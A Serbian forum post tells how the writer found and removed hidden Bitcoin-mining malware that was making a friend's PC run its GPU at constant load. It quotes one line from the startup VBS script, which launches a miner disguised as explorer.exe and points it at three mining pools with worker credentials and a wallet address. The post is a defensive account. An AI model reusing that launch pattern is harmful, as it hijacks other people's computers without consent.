Odavno više ne kopam ali sam u materiji, pa reko' da podelim ovo sa vama. Ortak se žalio već neko vreme da mu solidna mašina (i5 2500, GTX 660Ti, 12GB RAM, SSD...) daje malo FPS u igrama. Probao je da menja drajvere, neke aplikacije za optimizaciju ali ništa nije davalo konkretne rezultate ili je bilo rezultata do prvog restarta (bitna informacija). Na kraju sam mu predložio da proveri sa GPU-Z koliki je GPU Load dok igra. Pošto mu nisu bile jasne neke stvari u GPU-Z, povežem se preko Teamviewer-a na njegov komp da vidim o čemu se radi i provalim da mu je GPU Load u Windowsu konstantno 97%, vent na 40%, a klokovi kao za 3D mod, što ne bi smelo da se dešava.
Uz pomoć programa
GPU Shark pogledam koji procesi muče grafičku, pošto je i on prijavio 97% load, i izvalim da postoji neki skriveni proces, ne vidi se koji je .exe, samo stoji njegov PID. Ubijem taj task (taskkill /PID xxxx) i drugar kaže "šta je sa ventom?", pošto se istog trena smanjila buka
(već sam sumnjao na BTC virus). Preko msconfiga sam našao da se pokreće neki .vbs file sa mašinom a njegov sadržaj je sledeći (izbačen najveći deo da ne bih davao ideje drugima):
Kod:
errReturn = objProcess.Create("C:/Kernels/driver/explorer.exe -o http://eu-stratum.btcguild.com:3333 -u charlesh_worker -p imhere -o http://api2.bitcoin.cz:8332 -u charlesh.worker -p imhere -o http://mining.eligius.st:8337 -u 14dRhPtHcB5mw1GWXygVcgRKU4DepLkCRS -p x -I d", null, objConfig, intProcessID)
Koliko se vidi iz ovoga, mašina je kopala na 3 poola, za nekog charlesha :whip: a sama mašina nije imala antivirus, nego se ortak uzdao u zdrav razum i uključen UAC
Uglavnom, mašina je očišćena od ovog đubreta a poslao sam i mailove na support sva tri poola, u nadi da će ga makar negde saseći.